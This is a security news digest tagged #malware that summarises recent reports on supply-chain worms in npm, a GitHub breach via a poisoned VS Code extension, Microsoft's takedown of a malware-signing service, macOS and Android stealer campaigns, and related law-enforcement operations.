All news with #malware tag

⚡ This week's recap covers supply-chain compromises, resurfacing legacy bugs, and security tools themselves being targeted. Key incidents include a poisoned Nx Console VS Code extension leading to a GitHub breach, new active exploitation of Microsoft Defender flaws, and a nine-year-old Linux kernel privilege bug. Teams face increasing targeted phishing and widespread botnet scanning, while organizations scramble to patch critical CVEs and secure exposed services.

🛡️ Chromium contains an unpatched vulnerability that lets attackers keep a Service Worker alive across restarts and execute JavaScript persistently. Reported by researcher Lyra Rebane, the bug abuses the Background Fetch API and a race that creates and aborts background fetches to evade UI visibility. Although some UI fixes were applied in 2023, the deeper issue—preventing indefinite Service Worker lifetimes—remains unresolved and can enable tracking, crypto mining, and browser-based bots.

📝 This edition of the Threat Source newsletter blends career reflection with active threat intelligence. The author argues that being ungovernable — intellectually curious and challenging — can accelerate growth when paired with the right peers. Cisco Talos also documents a Chinese-language BadIIS MaaS campaign, highlighting indicators like embedded demo.pdb strings and recommending IIS monitoring and updated endpoint detections.

🔍 Flare researchers analyzed ~700 underground posts on the "Lucifer DaaS" between Jan 2025 and early 2026 to reveal how modern crypto drainers evolved into professionalized, service-like platforms. The study highlights affiliate-driven distribution, automation, website cloning, Permit2 abuse, and multichain support, showing how DaaS lowers technical barriers and increases resilience. It also lists practical indicators to help users avoid wallet-draining scams.

📱 Zimperium's zLabs uncovered a 10-month Android malware campaign that used nearly 250 fake apps to enroll victims in premium carrier billing services across Malaysia, Thailand, Romania and Croatia. The operation, running from March 2025 to January 2026, included three variants that ranged from cookie- and SMS-harvesting to a fully automated subscription flow against DiGi. The most advanced variant abused Google's SMS Retriever API, forced traffic onto cellular, loaded hidden carrier billing pages and intercepted one‑time passwords. Users are advised to avoid sideloading apps, verify installed apps and review mobile bills for unexplained charges.

🚨 The Mini Shai-Hulud worm resurfaced in a coordinated supply-chain wave that published 639 malicious versions across 323 npm packages tied to the AntV visualization ecosystem on 19 May, lasting roughly an hour. Analysis by Socket and updates from Microsoft show the payload added preinstall hooks executing an obfuscated Bun bundle to harvest cloud and CI secrets. Many affected packages are high-download dependencies and the compromised maintainer account held rights to over 500 packages. Responders should pin pre-19 May versions, rotate exposed credentials and audit GitHub for forged repository activity.

🔍 ESET researchers observed that China-aligned Webworm expanded its toolkit in 2025 with two new backdoors—EchoCreep and GraphWorm—that use Discord and the Microsoft Graph API for C2 communications. The actor increasingly favors proxy-based utilities and staging techniques such as SoftEther VPN and GitHub repositories to blend malicious traffic. Targets include government and enterprise entities across Asia and Europe, while older RATs appear to be abandoned.

🛡️ SentinelOne researchers describe a new SHub variant named Reaper that targets macOS users by impersonating Apple, Google, and Microsoft across a single attack chain. The campaign uses fake security alerts and a ClickFix-style workflow to trick victims into running malicious AppleScript via the applescript:// URI handler and the Script Editor, bypassing Terminal paste protections. Reaper performs environment checks, drops payloads, and establishes persistence through LaunchAgents, then harvests credentials, Keychain items, cryptocurrency wallets, and messaging data. Defenders are advised to shift toward behavior-based detection and monitor Script Editor, osascript, and suspicious LaunchAgent activity.

🔒 GitHub confirmed that a third party accessed roughly 3,800 internal repositories after a likely “poisoned” Visual Studio Code extension was found on an employee device on May 19. The intrusion was claimed by the TeamPCP group, which posted on the Breached forum and linked the access to private source code. GitHub says it has contained the incident, removed the malicious extension, isolated the endpoint and prioritized rotation of critical secrets. The company will publish a more detailed report when its investigation is complete.

🔎 Unit 42 documents clusters of TamperedChef-style campaigns that trojanize productivity tools (e.g., PDF editors, calendars) to deliver stealers, RATs and proxies. These operations use malvertising-driven distribution, legitimate-looking sites, frequent binary rebuilds and code signing to evade detection. We tracked three clusters (CL-CRI-1089, CL-UNK-1090, CL-UNK-1110), over 4,000 samples and 100 variants. If compromised, contact the Unit 42 Incident Response team for assistance.

🔒 Microsoft has disrupted the infrastructure behind a major malware code-signing service, seizing the group's site signspace[.]cloud and revoking more than 1,000 abused certificates. The company removed hundreds of attacker-controlled Azure virtual machines and linked the operation to a group it calls Fox Tempest. The service sold malware signing-as-a-service to ransomware affiliates, letting signed malicious installers evade Windows warnings and deploy backdoors, infostealers, and ransomware.

🔒 Microsoft says it disrupted a malware-signing-as-a-service operation that abused its Azure Artifact Signing platform to generate fraudulent short-lived code-signing certificates used by ransomware gangs and other cybercriminals. The actor, tracked as Fox Tempest, created over 1,000 certificates and hundreds of Azure tenants and subscriptions. Microsoft seized the signspace[.]cloud domain, took virtual machines offline, revoked certificates, and filed a lawsuit in the Southern District of New York.

🔒 The npm registry suffered a fast-moving supply-chain compromise on May 19 after attackers gained access to a high-privilege maintainer account (atool), pushing 637 malicious versions across 317 packages and infecting a large portion of the AntV namespace. The payload, a Mini-Shai-Hulud worm, steals npm/GitHub tokens and credentials and exfiltrates data to public GitHub repositories. AntV maintainers deleted infected versions, deprecated remaining packages, and advised users to audit, rotate credentials, and install known-safe releases.

🔍 Researchers at HUMAN's Satori Threat Intelligence team disclosed "Trapdoor," a multi-stage Android ad fraud and malvertising operation involving 455 malicious apps and 183 threat actor-owned C2 domains. The campaign used utility-like apps to trick users into installing secondary apps that launch hidden WebViews, load HTML5 cashout domains, and perform automated touch-fraud. At its peak Trapdoor generated about 659 million bid requests per day, drove over 24 million app installs—mostly from U.S. traffic—and Google removed the identified apps after disclosure.

🔒 Microsoft exposed and disrupted Fox Tempest, a criminal service selling malware-signing-as-a-service that helped disguise malware like Oyster, Lumma Stealer and Vidar as legitimate software. The Digital Crimes Unit used undercover personas to map the group's infrastructure and worked with hosting providers to sinkhole domains, disable virtual machines and suspend accounts. Microsoft filed a civil action in early May and unsealed a New York case on May 19.

🛡️ Bitdefender reports that Microsoft’s MSHTA (Microsoft HTML Application Host), a remnant from Internet Explorer, is actively abused as a living-off-the-land binary in ongoing malware campaigns. Attackers use it to execute obfuscated HTA content, launch PowerShell, and fetch loaders and stealers such as CountLoader, LummaStealer, Amatera and PurpleFox. Campaigns rely on fake downloads, cracked apps, SEO-poisoned pages and Discord phishing to trick victims into executing payloads. Because MSHTA is Microsoft-signed and preinstalled, it remains implicitly trusted and attractive to adversaries.

📈 Digital.ai's 2026 Application Security Threat Report found that 87% of monitored customer-facing apps were attacked in 2026, up sharply from 55% in 2022. The firm says agentic AI has lowered the skill and time required for threat actors to inspect code, generate exploits and adapt malware. Financial services, automotive and medical device apps were most targeted, and iOS attacks have nearly closed the gap with Android.

🔍 Since 2024, Talos has tracked a BadIIS variant identified by consistent "demo.pdb" PDB paths across the Asia‑Pacific region and isolated cases elsewhere. The PDB path patterns—including Chinese folder names, Administrator\Desktop build artifacts, and date‑based versioning—provide a reliable fingerprint for clustering and attribution. Talos recovered a 2022 builder that produces configured 32/64‑bit payloads, uses a unique 'lwxat' C2 authentication check and XOR 0x3 obfuscation, and supports modular SEO‑fraud and proxy features. Evidence shows active development from Sept. 2021 through Jan. 2026.

🔒 INTERPOL's Operation Ramz led to more than 200 arrests and the seizure of 53 servers used for phishing, malware, and online fraud, affecting at least 3,867 confirmed victims from nearly 8,000 intelligence packages. Authorities identified another 382 suspects across 13 MENA countries. INTERPOL partnered with private firms including Kaspersky, Group-IB, The Shadowserver Foundation, Team Cymru, and TrendAI to track malicious infrastructure. The operation disrupted phishing-as-a-service platforms, dismantled investment scam rings, and disabled malware-infected servers.

🔔 SentinelOne researchers disclosed a new SHub macOS infostealer variant, dubbed Reaper, that lures victims with fake app installers and uses the applescript:// URL scheme to launch a malicious AppleScript. The payload displays a bogus Apple security update, requests the macOS password, and executes a shell script that harvests browser data, crypto wallets, passwords, iCloud and Telegram artifacts, and files from Desktop and Documents. Reaper also persists via a LaunchAgent, hijacks wallet apps by replacing core files, and clears quarantine flags to evade Gatekeeper.